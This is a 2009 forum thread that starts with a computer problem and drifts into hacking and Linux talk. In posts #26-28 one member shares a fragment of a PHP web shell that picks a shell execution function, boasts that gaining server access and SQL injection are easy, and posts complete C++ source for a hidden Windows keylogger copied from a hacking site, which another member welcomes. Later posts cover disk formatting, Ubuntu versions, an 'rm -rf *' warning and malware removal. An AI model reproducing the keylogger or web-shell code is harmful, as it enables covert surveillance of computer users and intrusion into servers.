Jump to content


Photo

Wierd Computer Problem


40 replies to this topic

#26 nerfsharpie6

nerfsharpie6

    Member

  • Members
  • 326 posts

Posted 21 January 2009 - 05:22 PM

Well to my knowledge there are multiple ways to create a virus, all through programing languages. C++, php, VB6 or higher, perl, python, many more than I can remember.
Here's an example:

"<?php

#######################################################

# Get a working exec method

function get_execution_method() {

if(function_exists(passthru))

{ $m = "passthru"; }

if(function_exists('exec'))

{ $m = "exec; }

if(function_exists('shell_exec'))

{ $m = "shell_exec"; }

if (function_exists('system'))

{ $m = "system"; }

if(!isset($m))

{ $m = "Disabled"; }

return($m);

}

?>"

Mind you that is only a portion of a web shell and you need knowledge of PHP to complete it. I do not condone the use of these materials in nothing more than an educational sense.

If you don't understand the command structure don't worry its easy to understand. Most of the statements are for pass through and command execution to get you an exploit in a web page. If the web page is insecure than you can get access to information. Its all really complicated after that as you can get access to SQL tables which hold information to be parsed on the sever side (means its executed with PHP).
  • 0
We hang our flags and banners of victory off of your dead bodies.

#27 boisie

boisie

    Member

  • Members
  • 303 posts

Posted 21 January 2009 - 05:39 PM

<?php

#######################################################

# Get a working exec method

function get_execution_method() {

if(function_exists(passthru))

{ $m = "passthru"; }

if(function_exists('exec'))

{ $m = "exec; }

if(function_exists('shell_exec'))

{ $m = "shell_exec"; }

if (function_exists('system'))

{ $m = "system"; }

if(!isset($m))

{ $m = "Disabled"; }

return($m);

}

?>

Remember your code tags.

And sadly, I understand most of that. I was thinking of the code for hacking SQL tables after, but then I noticed I started using PHP 6 dev language features. Nothing else happened after that. I'm slightly ashamed.

Edited by boisie, 21 January 2009 - 05:39 PM.

  • 0
QUOTE(One Man Clan) View Post
You understand what you just did posting a picture of 4 girls on a message board chock full of nerdy virgins, right?
QUOTE(Foamfoot) View Post
Maybe if we download Ubuntu Christian edition, God will help us install it.

#28 nerfsharpie6

nerfsharpie6

    Member

  • Members
  • 326 posts

Posted 21 January 2009 - 06:00 PM

If you don't have a deployment method or know how to deploy it, you kinda feel retarded. I know I did when I was trying C++. If you do manage to get access to a server (which I'm ashamed to say is easy) then you can do php, and SQL injection to get what you need/want. I also purposely messed the tags p a bit. You know don't want kids playing with e-fire.

If any one is interested then you can get XAMPP (LAMPP for Linux) and get SQL and PHP. You can edit your PHP and SQL projects with Note Pad (I prefer Screem for Linux...sudo su to root then apt-get install screem). Its all quite fun when you get to know how the simple command structure works for PHP.

"#include <windows.h>
#include <stdio.h>

int main()
{
AllocConsole();
ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0);

FILE *Log;
short key;
char szKey[MAX_PATH];
int scan;

while(1)
{
Sleep(10);
for(key=0;key<256;key++)
{
if(GetAsyncKeyState(key)==-32767)
{
scan=MapVirtualKeyEx(key,0,GetKeyboardLayout(0));
GetKeyNameText(scan << 16,szKey,MAX_PATH);
Log=fopen ("log.txt", "a+");
fprintf(Log,"[%s]",szKey);
fclose(Log);
}
}
}
}"

Log catcher in C++. Complete code, but I can't take credit for this, as I got it off a site call ed Darkmindz. Its no longer online. My guess is that it logs keystrokes, but I haven't gotten it to compile and run since it says there are a few errors that need to be worked out. Remember for educational use only!!!!
  • 0
We hang our flags and banners of victory off of your dead bodies.

#29 bogboogalars

bogboogalars

    Member

  • Members
  • 398 posts

Posted 21 January 2009 - 10:51 PM

Oh you are a beast, thank you for that... Fun time she comes!
  • 0

#30 nerfsharpie6

nerfsharpie6

    Member

  • Members
  • 326 posts

Posted 23 January 2009 - 02:27 PM

Anybody know how to change file system from NTFS to FAT32? I have an external HDD and I want to change it from NTFS to FAT 32, but I don't get an option to do so. Is it possible or will I have to create a partition and and convert to FAT32 from there?
  • 0
We hang our flags and banners of victory off of your dead bodies.

#31 boisie

boisie

    Member

  • Members
  • 303 posts

Posted 23 January 2009 - 02:33 PM

You need to reformat your external HDD.
  • 0
QUOTE(One Man Clan) View Post
You understand what you just did posting a picture of 4 girls on a message board chock full of nerdy virgins, right?
QUOTE(Foamfoot) View Post
Maybe if we download Ubuntu Christian edition, God will help us install it.

#32 nerfsharpie6

nerfsharpie6

    Member

  • Members
  • 326 posts

Posted 23 January 2009 - 06:30 PM

Well I got Magic Partition and that doesn't help. It just gives me errors when I reformat. I'm just gonna use it to hold my media and other Downloads.
  • 0
We hang our flags and banners of victory off of your dead bodies.

#33 boisie

boisie

    Member

  • Members
  • 303 posts

Posted 23 January 2009 - 06:54 PM

This is where I would suggest using an Ubuntu LiveCD for it's partition manager, but some people may not understand the reasoning behind it.
  • 0
QUOTE(One Man Clan) View Post
You understand what you just did posting a picture of 4 girls on a message board chock full of nerdy virgins, right?
QUOTE(Foamfoot) View Post
Maybe if we download Ubuntu Christian edition, God will help us install it.

#34 nerfsharpie6

nerfsharpie6

    Member

  • Members
  • 326 posts

Posted 23 January 2009 - 08:39 PM

I've actually been considering using my external drive to hold Ubuntu because Windows 7 beta won't run on my system (stupid lack of RAM). But Ubuntu users would understand why, I know I do.

I wonder if Ubuntu can be installed on my Drive from a Live CD? I just have to check if my BIOS can boot from USB.
  • 0
We hang our flags and banners of victory off of your dead bodies.

#35 boisie

boisie

    Member

  • Members
  • 303 posts

Posted 23 January 2009 - 09:56 PM

I've actually been considering using my external drive to hold Ubuntu because Windows 7 beta won't run on my system (stupid lack of RAM). But Ubuntu users would understand why, I know I do.

I wonder if Ubuntu can be installed on my Drive from a Live CD? I just have to check if my BIOS can boot from USB.

I have an ubuntu install on the external hooked up to the PC I'm using right now. It works Effeminateally fine. I expected it to be slow, but it's much closer to an internal HDD install than a LiveCD install. Only large data things are the issue.

Remember to unmount the External though. Otherwise it can't format and partition it.

Edited by boisie, 23 January 2009 - 09:57 PM.

  • 0
QUOTE(One Man Clan) View Post
You understand what you just did posting a picture of 4 girls on a message board chock full of nerdy virgins, right?
QUOTE(Foamfoot) View Post
Maybe if we download Ubuntu Christian edition, God will help us install it.

#36 Foamfoot

Foamfoot

    Member

  • Members
  • 461 posts

Posted 23 January 2009 - 10:46 PM

A friend just showed me his linux laptop and PSP, holy shit. Guess I got the wrong version or something...
  • 0
Pro-pants
(Unofficial) Wii thread
QUOTE(Bedhed117 @ Aug 14 2009, 03:49 PM) View Post

Damn it Foamfoot. Why is it that you kill every good topic with a retarded response a few days late.


#37 nerfsharpie6

nerfsharpie6

    Member

  • Members
  • 326 posts

Posted 23 January 2009 - 11:58 PM

You probably got a buggy early release of Linux. If it was Ubuntu you probably got like Feisty Fawn (6.0 or earlier) which had some issues with it, but the newest version which is like 8.10 is way updated. Use Ubuntu first though, you don't want to get Red Hat Linux, Slackware, or anything else right now until you become comfortable using the Distros that Ubuntu uses and you can execute terminal commands and fix common issues solo.

Good to know that Ubuntu/Linux can run well on an external drive, but since my BIOS won't boot from USB I can't do anything...damn Bios from '02.

Edited by nerfsharpie6, 24 January 2009 - 12:00 AM.

  • 0
We hang our flags and banners of victory off of your dead bodies.

#38 analogkid

analogkid

    Member

  • Members
  • 425 posts

Posted 24 January 2009 - 11:19 AM

The look, feel, and often function of GNU/Linux depends on what distro you get.

The only partition editor you will ever need is here:
http://gparted.sourc....net/livecd.php
  • 0

#39 boisie

boisie

    Member

  • Members
  • 303 posts

Posted 24 January 2009 - 02:03 PM

You probably got a buggy early release of Linux. If it was Ubuntu you probably got like Feisty Fawn (6.0 or earlier) which had some issues with it, but the newest version which is like 8.10 is way updated. Use Ubuntu first though, you don't want to get Red Hat Linux, Slackware, or anything else right now until you become comfortable using the Distros that Ubuntu uses and you can execute terminal commands and fix common issues solo.

Good to know that Ubuntu/Linux can run well on an external drive, but since my BIOS won't boot from USB I can't do anything...damn Bios from '02.

You. Are. A. Retard. Not to be mean, but if you weren't, you would have known some of this already.

There is no Ubuntu 6.0 release, and it is definitely not Feisty Fawn. The releases are the year released[dot]month released. They try to stay on a six month schedule. This means: 4.10, 5.04, 5.10, (Got off track) 6.06, 6.10, 7.04, 7.10, 8.04, 8.10, and next is 9.04. The names also go in alphabetical order. Currently 8.10 is Intrepid Ibex. 7.04 was Feisty Fawn.

Linux is also more stable than most other Operating Systems. That's why Macs crash less than Windows PCs. OSX is based on the Mach microkernel. The only difference is that this version of Mach was developed by a company. Linux was developed as free. That is why it's grown up the way it has. It started looking to be an alternative. And as it grew, more people liked the kernels way of doing things. That's why there are so many distros. Linux is a kernel. You can find it at http://www.kernel.org/ and use it to make your own. What matters is not that it uses the Linux kernel, but how it uses the Linux kernel. there are currently over 50 variants of the Ubuntu Distro. Until I found Damn Small Linux, I would run an extinct distro called Storm Linux 2000 on my laptop.

It doesn't matter what the hell you use, it matters that you know what the fuck the warranty on the thing is. There is, in reality, NO WARRANTY (Or as limited a warranty as the extent of the law allows.) It's stated in almost every License you can find tacked to a linux distro. Choose a distro based on your knowledge and needs. If your getting your feet wet, go with something that has a livecd so you can get into it first. If your already looking for the cutting edge, and know never to put the command
rm -rf *
in a terminal, you'll know what to choose for yourself.

Thank you for your time.

PS- look around for a bios updates for your pc. That should help.
  • 0
QUOTE(One Man Clan) View Post
You understand what you just did posting a picture of 4 girls on a message board chock full of nerdy virgins, right?
QUOTE(Foamfoot) View Post
Maybe if we download Ubuntu Christian edition, God will help us install it.

#40 mystefansdontflystraight

mystefansdontflystraight

    Member

  • Members
  • 1,176 posts

Posted 24 January 2009 - 02:11 PM

Back to the original problem: I got something like this. It's called system security and its a virus that warns you about all kinds of crap like a virus is trying to send your credit card info to a remote host, hoping to scare you into buying the full version, which is like 99$ and steals your credit card info. Anyway, I downloaded Malawarebytes, and it got rid of it in minutes. Try that, if it doesn't work, I really can't help you, but it went around my dad's office, and this was the program everyone used to get rid of it.
  • 0
QUOTE(Blacksunshine @ Dec 24 2009, 02:15 PM) View Post

QUOTE(white moonlight @ Dec 23 2009, 01:29 PM) View Post

It's just screaming to be rearloading...

I seen a movie about that once.



#41 nerfsharpie6

nerfsharpie6

    Member

  • Members
  • 326 posts

Posted 24 January 2009 - 02:18 PM

Then why does Ubuntu go back to earlier releases then 7.0. They also had weird names like Feisty Fawn, Hardy Heron and others...check their boards, it even says thats what they're called.

Any one know where to get Phoenix BIOS updates, Phoenix LTD upgrade page decided to disappear.
  • 0
We hang our flags and banners of victory off of your dead bodies.


1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users